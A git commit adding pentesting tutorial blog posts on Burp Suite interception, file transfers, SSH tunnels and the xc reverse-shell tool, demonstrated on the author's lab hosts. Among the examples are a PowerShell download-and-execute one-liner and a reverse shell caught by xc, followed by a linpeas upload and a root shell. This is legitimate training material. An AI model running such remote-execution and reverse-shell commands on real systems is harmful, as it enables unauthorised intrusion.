add hacking blogposts as they are

Tools/0/index.md

@@ -0,0 +1,10 @@
+# Setup
+
+![](0.png)
+
+## Introduction :
+
+## **Installation**
+
+## **Example Usage**
+

Tools/burp/index.md

@@ -0,0 +1,83 @@
+# Burpsuite Setup
+
+![](0.png)
+
+## Introduction :
+
+Burpsuite is a Java Application developped by PortSwigger which is used as a pentest framework for web applications. In this tutorial we're going to look at how it can be commonly used.
+
+## **Installation**
+
+First let's install [FoxyProxy](https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/?utm_source=addons.mozilla.org&utm_medium=referral&utm_content=search)
+
+![](1.png) ![](2.png) ![](3.png)
+
+Then we install burpsuite:
+    
+    
+    apt install burpsuite
+    
+    
+
+## **Intercepting HTTP requests**
+
+Now let's configure FoxyProxy to intercept the request we make to the server:
+
+![](4.png) ![](5.png)
+
+Now let's test it:
+
+![](6.png)
+
+So here we intercepted the request we made for the server, we didn't forward it yet.
+    
+    
+    GET /login.php HTTP/1.1
+    Host: previse.htb
+    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
+    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+    Accept-Language: en-US,en;q=0.5
+    Accept-Encoding: gzip, deflate
+    Connection: close
+    Cookie: PHPSESSID=s4pu8loq7vmi15a095ipjl1095
+    Upgrade-Insecure-Requests: 1
+    
+    
+
+Usually what we want to do is test what we can send to the web server, repeatedly. To do that we use the repeater tab (**CTRL+R** to send the request to the repeater tab and **CTRL+SHIFT+R** to go to the repeater tab):
+
+![](7.png)
+
+So from here we can change the request and keep sending it to check how the web server behaves differently:
+
+![](8.png)
+
+## **Intercepting HTTPS requests**
+
+Now that we managed to intercept our HTTP request let's do the same with HTTPS, it requires a little more setup:
+
+While the intercept is on, let's go to **http://burp** in order to download burpsuite's certificate:
+
+![](9.png)
+    
+    
+    [ 10.10.14.68/23 ] [ /dev/pts/20 ] [~/Downloads]
+    → file cacert.der
+    cacert.der: Certificate, Version=3
+    
+    
+
+And now with this we want our firefox browser to consider this certificate as secure, via a security exception:
+
+![](10.png) ![](11.png) ![](12.png)
+
+Now with this change we can intercept HTTPS traffic:
+
+![](14.png)
+
+Now do the 2 keybinds to send the request to the repeater tab:
+
+![](15.png)
+
+And there you have it ! We have been able to intercept both HTTP and HTTPS traffic via burpsuite to debug how websites respond to our requests!
+

Tools/files/index.md

@@ -0,0 +1,192 @@
+# File Transfers
+
+![](files.png)
+
+## Introduction :
+
+During system administration tasks and even more so during pentests, one will come across the need to transfer files from one host to another. And it is actually simpler than you think! There is no need to go through an external server for that.
+
+## **Linux -> Linux**
+
+On 99% of linux distributions, there is python installed by default, python has a HTTP module by default, and it can be used to 'serve' files from one host to another: 
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/23 ] [blog/HTB/Tools]
+    → ssh home
+    Linux home 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
+    
+    The programs included with the Debian GNU/Linux system are free software;
+    the exact distribution terms for each program are described in the
+    individual files in /usr/share/doc/*/copyright.
+    
+    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+    permitted by applicable law.
+    Last login: Tue Jun 15 03:00:12 2021 from 127.0.0.1
+    root@home:~# ip a | grep inet | grep 10.0.0
+        inet 10.0.0.101/16 brd 10.0.255.255 scope global ens18
+    
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/37 ] [/tmp]
+    → ip a | grep inet | grep 10.0.0
+        inet 10.0.0.10/16 brd 10.0.255.255 scope global dynamic noprefixroute eth0
+    
+    
+
+Let's say i want to transfer files from my 'home' machine at **10.0.0.101** to and from my 'mainpc' machine at **10.0.0.10**
+
+First thing to check is if the hosts can ping each other:
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/37 ] [/tmp]
+    → ping 10.0.0.101 -c2
+    PING 10.0.0.101 (10.0.0.101) 56(84) bytes of data.
+    64 bytes from 10.0.0.101: icmp_seq=1 ttl=64 time=0.571 ms
+    64 bytes from 10.0.0.101: icmp_seq=2 ttl=64 time=0.594 ms
+    
+    root@home:~# ping -c2 10.0.0.10
+    PING 10.0.0.10 (10.0.0.10) 56(84) bytes of data.
+    64 bytes from 10.0.0.10: icmp_seq=1 ttl=64 time=0.805 ms
+    64 bytes from 10.0.0.10: icmp_seq=2 ttl=64 time=0.693 ms
+    
+    
+
+And they can, now in order to SERVE files you can use python's SimpleHTTPServer module:
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/37 ] [/tmp]
+    → python -m SimpleHTTPServer 8080
+    Serving HTTP on 0.0.0.0 port 8080 ...
+    
+    
+
+Or you can use python3's http module:
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/37 ] [/tmp]
+    → python3 -m http.server 8080
+    Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
+    
+    
+
+Now that the local http server is active on port 8080, you can see what it looks like from a web-browser:
+
+![](files2.png)
+
+so now you need to check if you have access to either **wget** , or **curl** or **nc**
+    
+    
+    root@home:~# which wget curl nc
+    /usr/bin/wget
+    /usr/bin/curl
+    /usr/bin/nc
+    
+    
+
+These are all 3 binaries you can use to GET the files to that machine. Let's download our test.txt file to my home machine: 
+    
+    
+    root@home:/tmp# wget http://10.0.0.10:8080/test.txt -O test.txt
+    --2021-06-15 09:13:21--  http://10.0.0.10:8080/test.txt
+    Connecting to 10.0.0.10:8080... connected.
+    HTTP request sent, awaiting response... 200 OK
+    Length: 0 [text/plain]
+    Saving to: ‘test.txt’
+    
+    test.txt                               [ <=>                                                           ]       0  --.-KB/s    in 0s
+    
+    2021-06-15 09:13:21 (0.00 B/s) - ‘test.txt’ saved [0/0]
+    
+    root@home:/tmp# curl http://10.0.0.10:8080/test.txt > test.txt
+      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
+                                     Dload  Upload   Total   Spent    Left  Speed
+      0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
+    
+    
+
+Now in order to transfer files using netcat (nc) you need to do the following:
+    
+    
+    root@home:/tmp# nc -lvnp 9001  > test.txt
+    listening on [any] 9001 ...
+    
+    
+
+First you setup netcat to listen on port 9001, and then you SEND the test file from the other host:
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/38 ] [/tmp]
+    → cat test.txt | nc 10.0.0.101 9001
+    
+    
+    root@home:/tmp# nc -lvnp 9001  > test.txt
+    listening on [any] 9001 ...
+    connect to [10.0.0.101] from (UNKNOWN) [10.0.0.10] 41694
+    
+    ^C (or CTRL+C)
+    
+
+As you can see there has been a connection made there, and once it's done transferring hit CTRL+C to close netcat. We can also check the md5sum hashes of both files on both hosts to check if they are the same.
+    
+    
+    root@home:/tmp# md5sum test.txt
+    ef7cbb58d1d239b28fc6ae18e9ccf8ea  test.txt
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/38 ] [/tmp]
+    → md5sum test.txt
+    ef7cbb58d1d239b28fc6ae18e9ccf8ea  test.txt
+    
+    
+
+And as you can see here, both files are identical because they have the same hashes.
+
+## **Linux -> Windows**
+
+Now in order to transfer files from a linux host to a windows host, First just like before we use python to serve our files:
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/37 ] [/tmp]
+    → python3 -m http.server 8080
+    Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
+    
+    
+
+Next you need to open powershell (either via SSH or via the windows desktop (WIN+X i)), and use the following:
+    
+    
+    Windows PowerShell
+    Copyright (C) Microsoft Corporation. All rights reserved.
+    
+    Try the new cross-platform PowerShell https://aka.ms/pscore6
+    
+    PS C:\Users\nothing> cd C:\Temp
+    PS C:\Temp>
+    
+
+Now what we will use here to GET the file is the following one liner command:
+    
+    
+    Invoke-WebRequest -Uri http://10.0.0.10:8080/test.txt -O test2.txt
+    iwr -Uri http://10.0.0.10:8080/test.txt -O test2.txt
+    
+    
+
+` ![](files3.png)
+
+This will basically download the file. Now if you want to run commands from the command line you can do the following:
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/1 ] [/tmp]
+    → echo 'ls' > test.ps1
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/1 ] [/tmp]
+    → python3 -m http.server 9090
+    Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+    
+    iex(new-object net.webclient).downloadstring('http://10.0.0.10:9090/test.ps1')
+    
+
+` ![](files4.png)
+
+And there you go! We managed to run the code inside of the test.ps1 file right after downloading it.
+

Tools/sshtunnels/index.md

@@ -0,0 +1,180 @@
+# SSH Tunnels
+
+![](sshtunnel.jpeg)
+
+## Introduction :
+
+SSH tunnels are commonly used in sysadmin and pentesting tasks in order to access remotel-only or local-only accessible ports. In this tutorial we're going to demonstrate how it works:
+
+## **Requirements**
+
+The prerequisite is obvious, get a SSH connection, i will use my ssh connection to my home host:
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/19 ] [blog/HTB/Tools]
+    → cat ~/.ssh/config
+    Host home
+            Hostname 10.0.0.101
+            IdentityFile ~/.ssh/mainpc
+            User root
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/18 ] [blog/HTB/Tools]
+    → ssh home
+    Linux home 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
+    
+    The programs included with the Debian GNU/Linux system are free software;
+    the exact distribution terms for each program are described in the
+    individual files in /usr/share/doc/*/copyright.
+    
+    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+    permitted by applicable law.
+    Last login: Tue Jun 15 09:03:34 2021 from 10.0.0.10
+    root@home:~#
+    
+    
+
+That's a SSH connection using the private key in my **~/.ssh/** directory. Of course this also works with regular SSH connections, you just have to specify the username and the remote host **ssh user@ip**
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/18 ] [blog/HTB/Tools]
+    → ssh root@10.0.0.101
+    root@10.0.0.101's password:
+    Linux home 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
+    
+    The programs included with the Debian GNU/Linux system are free software;
+    the exact distribution terms for each program are described in the
+    individual files in /usr/share/doc/*/copyright.
+    
+    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+    permitted by applicable law.
+    Last login: Tue Jun 15 10:57:36 2021 from 10.0.0.10
+    root@home:~#
+    
+
+Currently i am using the following network :
+
+![](sshtunnels2.png)
+
+## **Using SSH Tunnels**
+
+One of the many use cases you want to use SSH tunnels for, is to access ports that are only remotely accessible. For example, there is a port that will only accept connections from localhost (127.0.0.1), In theory this is not possible to access this port from across the network, it should only be possible on the server ITSELF.
+
+![](sshtunnels3.png)
+
+Now the use case of SSH tunnels here is that we want to be able to access that **9091** port on the **10.0.0.101** host locally. But we currently can't because it restrics connections from it's localhost.
+    
+    
+    [terminal 1]
+    root@home:/tmp/test# python3 -m http.server 9091 --bind 127.0.0.1
+    Serving HTTP on 127.0.0.1 port 9091 (http://127.0.0.1:9091/) ...
+    
+    [terminal 2]
+    [ 10.66.66.2/32 ] [ /dev/pts/18 ] [blog/HTB/Tools]
+    → curl 10.0.0.101:9091
+    curl: (7) Failed to connect to 10.0.0.101 port 9091: Connection refused
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/18 ] [blog/HTB/Tools]
+    → ssh home
+    
+    root@home:~# curl 127.0.0.1:9091
+    
+    
+    
+    # Directory listing for /
+    
+    
+    
+    
+
+Now here you see that we can only access the webserver from the hosts' localhost. So let's spawn a SSH Tunnel to port forward the remote 9091 port to our **local** port with the **-L** flag with the following syntax:
+
+ssh **-L [local_bind:]localport:remote_bind:remoteport** user@ip 
+
+If we don't specify the local bind, ssh assumes that this is 127.0.0.1, so let's say we want to port forward the remote port **9091** to our local port **9999** we use the following command:
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/18 ] [blog/HTB/Tools]
+    → **ssh -L 9999:127.0.0.1:9091 home**
+    Linux home 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
+    
+    The programs included with the Debian GNU/Linux system are free software;
+    the exact distribution terms for each program are described in the
+    individual files in /usr/share/doc/*/copyright.
+    
+    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+    permitted by applicable law.
+    Last login: Tue Jun 15 12:22:58 2021 from 10.0.0.10
+    root@home:~#
+    
+    
+
+` ![](sshtunnels4.png)
+
+Now with this the SSH Tunnel is active, and you can verify that we port forwarded the remote port 9091 to our local port 9999 :
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/19 ] [blog/HTB/Tools]
+    → curl 127.0.0.1:9999
+    
+    
+    
+    # Directory listing for /
+    
+    
+    
+
+Now we can also do the opposite, where we expose one of our local ports to the **remote** server using the **-R** flag which stands for Reverse:
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/0 ] [/tmp/test]
+    → python3 -m http.server 8081 --bind 127.0.0.1
+    Serving HTTP on 127.0.0.1 port 8081 (http://127.0.0.1:8081/) ...
+    
+    
+
+` ![](sshtunnels5.png)
+
+We can check it is there with curl:
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/19 ] [blog/HTB/Tools]
+    → curl 127.0.0.1:8081
+    
+    
+    
+    # Directory listing for /
+    
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/19 ] [blog/HTB/Tools]
+    → ssh home
+    
+    root@home:~# curl 10.0.0.10:8081
+    curl: (7) Failed to connect to 10.0.0.10 port 8081: Connection refused
+    
+    
+
+So we create a SSH tunnel using the following syntax:
+
+ssh **-R [remote_bind:]remoteport:localbind:localport** user@ip
+
+Same as before, the remote bind isn't needed, by default it will use localhost.
+
+![](sshtunnels6.png)
+
+Here we want the remote host to have our local **8081** port to be forwarded to the remote **8888** port:
+    
+    
+    [ 10.66.66.2/32 ] [ /dev/pts/18 ] [/tmp/test]
+    → ssh -R 8888:127.0.0.1:8081 home
+    
+    root@home:~# curl 127.0.0.1:8888
+    
+    
+    # Directory listing for /
+    
+    
+    
+
+And that's it! We verified that our port forwarding was successful.
+

Tools/xc/index.md

@@ -0,0 +1,237 @@
+# xc Setup
+
+![](xc.png)
+
+## Introduction :
+
+[xc](https://github.com/xct/xc) is an alternative improvement to the netcat utility that was made by [xct](https://app.hackthebox.eu/profile/13569) one of the top hackthebox users, it was written in golang and allows for a whole range of options like uploading, downloading, port local/remote port forwarding, or just spawning a shell on the remote server.
+
+## **Installation**
+    
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
+    → sudo apt install golang-go
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
+    → git clone https://github.com/xct/xc ; cd xc
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
+    → go version
+    go version go1.15.9 linux/amd64
+    
+    
+
+We first need go version 1.15+ to be able to compile the xc binary, then clone the xc repository, then we follow the setup steps on the README.md:
+    
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+    → go get golang.org/x/sys/...
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+    → go get golang.org/x/text/encoding/unicode
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+    → go get github.com/hashicorp/yamux
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+    → go get github.com/ropnop/go-clr
+    package github.com/ropnop/go-clr: build constraints exclude all Go files in /home/nothing/go/src/github.com/ropnop/go-clr
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+    → pip3 install donut-shellcode
+    Collecting donut-shellcode
+      Downloading donut-shellcode-0.9.2.tar.gz (149 kB)
+         |████████████████████████████████| 149 kB 2.0 MB/s
+    Building wheels for collected packages: donut-shellcode
+      Building wheel for donut-shellcode (setup.py) ... done
+      Created wheel for donut-shellcode: filename=donut_shellcode-0.9.2-cp39-cp39-linux_x86_64.whl size=56786 sha256=0e6037e945da6f8496c98bdb849a13ca84339af1ef50166a7480d6477d9729b8
+      Stored in directory: /home/nothing/.cache/pip/wheels/ac/72/45/1a77c4737812b5635cd958224c0ff623ebcef62c15ef083bab
+    Successfully built donut-shellcode
+    Installing collected packages: donut-shellcode
+    Successfully installed donut-shellcode-0.9.2
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+    → sudo apt install rlwrap upx -y
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+    → make
+    
+    
+
+## **Basic Usage**
+    
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+    → ls -lash | grep xc
+    1.3M -rwxr-xr-x  1 nothing nothing 1.3M May 30 14:03 xc
+    3.2M -rwxr-xr-x  1 nothing nothing 3.2M May 30 14:03 xc.exe
+    4.0K -rw-r--r--  1 nothing nothing 2.7K May 30 14:03 xc.go
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+    → file xc xc.exe xc.go
+    xc:     ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), statically linked, no section header
+    xc.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
+    xc.go:  C source, ASCII text
+    
+    
+
+So now we successfully compiled xc for both linux and windows, let's test the linux version on a remote host:
+    
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/76 ] [HTB/Servmon/xc]
+    → ls -lash | grep xc
+    1.3M -rwxr-xr-x  1 nothing nothing 1.3M May 30 14:03 xc
+    3.2M -rwxr-xr-x  1 nothing nothing 3.2M May 30 14:03 xc.exe
+    4.0K -rw-r--r--  1 nothing nothing 2.7K May 30 14:03 xc.go
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/76 ] [HTB/Servmon/xc]
+    → python3 -m http.server 9090
+    Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+    
+    
+
+Now from the remote host we download the compiled binary file:
+    
+    
+    root@home:/tmp# which wget curl
+    /usr/bin/wget
+    /usr/bin/curl
+    
+    root@home:/tmp# wget http://10.0.0.10:9090/xc -O /tmp/xc
+    --2021-06-02 13:52:14--  http://10.0.0.10:9090/xc
+    Connecting to 10.0.0.10:9090... connected.
+    HTTP request sent, awaiting response... 200 OK
+    Length: 1298072 (1.2M) [application/octet-stream]
+    Saving to: ‘/tmp/xc’
+    
+    /tmp/xc                                       100%[===============================================================================================>]   1.24M  --.-KB/s    in 0.1s
+    
+    2021-06-02 13:52:14 (11.4 MB/s) - ‘/tmp/xc’ saved [1298072/1298072]
+    
+    
+
+Now that xc is on both machines, let's start to use it:
+    
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/76 ] [HTB/Servmon/xc]
+    → ./xc
+    Usage:
+    - Client: xc ip port
+    - Server: xc -l -p port
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/76 ] [HTB/Servmon/xc]
+    → ./xc -l -p 9003
+    
+    
+                    __  _____
+                    \ \/ / __|
+                    >  <****(__
+                    /_/\_\___| by @xct_de
+                               build: QUnVVFdLYEkibcKx
+    
+    2021/06/02 13:54:35 Listening on :9003
+    2021/06/02 13:54:35 Waiting for connections...
+
+Now that our local host is listening on port 9003, let's go on the remote host to send the reverse shell connection on our local port:
+    
+    
+    
+    root@home:/tmp# ./xc
+    Usage:
+    - Client: xc ip port
+    - Server: xc -l -p port
+    root@home:/tmp# ./xc 10.0.0.10 9003
+    2021/06/02 13:57:30 Connected to 10.0.0.10:9003
+    
+    
+
+Back to our local host we see that we catched the incoming reverse shell connection:
+    
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/76 ] [HTB/Servmon/xc]
+    → ./xc -l -p 9003
+    
+                    __  _____
+                    \ \/ / __|
+                    >  ****(__
+                    /_/\_\___| by @xct_de
+                               build: QUnVVFdLYEkibcKx
+    
+    2021/06/02 13:54:35 Listening on :9003
+    2021/06/02 13:54:35 Waiting for connections...
+    2021/06/02 13:57:45 Connection from 10.0.0.101:36398
+    2021/06/02 13:57:45 Stream established
+    
+    [*] Auto-Plugins:
+    [xc: /tmp]: !help
+    Usage:
+    └ Shared Commands:  !exit
+      !upload src dst
+       * uploads a file to the target
+      !download src dst
+       * downloads a file from the target
+      !lfwd localport remoteaddr remoteport
+       * local portforwarding (like ssh -L)
+      !rfwd remoteport localaddr localport
+       * remote portforwarding (like ssh -R)
+      !lsfwd
+       * lists active forwards
+      !rmfwd index
+       * removes forward by index
+      !plugins
+       * lists available plugins
+      !plugin plugin
+       * execute a plugin
+      !spawn port
+       * spawns another client on the specified port
+      !shell
+       * runs /bin/sh
+      !runas username password domain
+       * restart xc with the specified user
+      !met port
+       * connects to a x64/meterpreter/reverse_tcp listener
+      !restart
+       * restarts the xc client
+    └ OS Specific Commands:
+     !ssh port
+       * starts sshd with the configured keys on the specified port
+
+Now from here we can do things like sending a file to scan the system for privilege escalation paths like [linpeas.sh](peas.html) to do that, we simply put the script inside the directory where we started the xc listener, and we use the **!upload** function:
+    
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/77 ] [HTB/Servmon/xc]
+    → locate linpeas.sh
+    /home/nothing/HTB/Admirer/linpeas.sh
+    /home/nothing/HTB/OpenAdmin/linpeas.sh
+    /home/nothing/HTB/Postman/linpeas.sh
+    /home/nothing/HTB/Traverxec/linpeas.sh
+    /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh
+    
+    [ 10.10.14.13/23 ] [ /dev/pts/77 ] [HTB/Servmon/xc]
+    → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+    
+    [xc: /tmp]: !upload linpeas.sh /tmp/linpeas.sh
+    [+] Upload complete
+    
+
+And then we simply spawn a shell with the **!shell** function:
+    
+    
+    [xc: /tmp]: !shell
+    
+    root@home:/tmp# id
+    id
+    uid=0(root) gid=0(root) groups=0(root)
+    
+    root@home:/tmp# chmod +x /tmp/linpeas.sh
+    chmod +x /tmp/linpeas.sh
+    
+    root@home:/tmp# /tmp/linpeas.sh
+    
+
+And that's basically how you scan a box for privesc paths. Linpeas.sh is going to scan for every tangible privilege escalation paths on the machine and use colors to display which information may be important.
+
+![](xc1.png)
+
+This can also be done on windows with winPEAS, you can check that out on the easy ServMon HTB box machine i made a writeup for.
+